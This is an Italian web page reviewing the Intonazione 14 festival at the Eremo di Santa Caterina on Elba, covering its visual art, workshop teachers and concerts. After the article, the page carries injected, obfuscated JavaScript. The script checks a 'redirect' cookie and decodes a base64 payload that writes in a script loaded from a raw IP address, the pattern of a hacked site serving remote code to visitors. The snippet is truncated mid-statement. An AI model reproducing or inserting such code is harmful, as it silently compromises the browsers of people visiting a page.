Intonazione non è un semplice Festival, è l’appuntamento fisso dell’estate elbana che riesce a conciliare figure artistiche internazionali con l’attitudine ad entrare nella storia e la spiritualità dell’Eremo di Santa Caterina.
È la sintonia perfetta tra melodia e suggestione, tra armonia e spirito dei luoghi. Quest’anno poi, in occasione del Bicentenario, è stato reso un elegante omaggio anche alla figura di Napoleone.
Intonazione sposa l’arte in tutte le sue forme. La cornice del Festival è dedicata alle arti visive, con l’esposizione delle opere di alcuni degli artisti che hanno soggiornato all’Eremo di Santa Caterina dagli anni novanta ad oggi: rappresentazioni iconografiche ritraenti Santa Caterina, sculture ed istallazioni permanenti conservate all’interno dell’Orto Botanico e nei dintorni dell’Eremo.
Altro punto forte del Festival è il Workshop, che ogni anno permette di partecipare alle lezioni con insegnanti di livello internazionale. Quest’anno Karen Asatrian ha tenuto lezioni di improvvisazione strumentale, Ulrike Engeldi formazione classica strumentale e Gunnar Eriksson di improvvisazione corale.
Gli allievi hanno mostrato i risultati delle lezioni durante il concerto finale: oltre alle improvvisazioni sul tema, quest’anno in via del tutto eccezionale si è tenuta l’esecuzione di un brano fisso: l’Inno dell’Elba “Terra Nostra” composto da Alberto Carletti di Rio Marina, che è stato presentato in un arrangiamento originale studiato dei partecipanti.
Oltre a tutte questo, per farti innamorare dell’Eremo e delle sue suggestioni, Intonazione 14 ci ha regalato lo straordinario talento di artisti di fama internazionale come la popstar norvegese Thomas Dybdahl, the Real group, il Quartetto Prometeo, la flautista Dorothee Oberlinge, il liutista Luca Pianca e il gruppo brasiliano Trio Realejo.
Emozioni pure in musica, ispirazioni indimenticabili che porteremo nel cuore sino al prossimo Festival Intonazione…
_ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘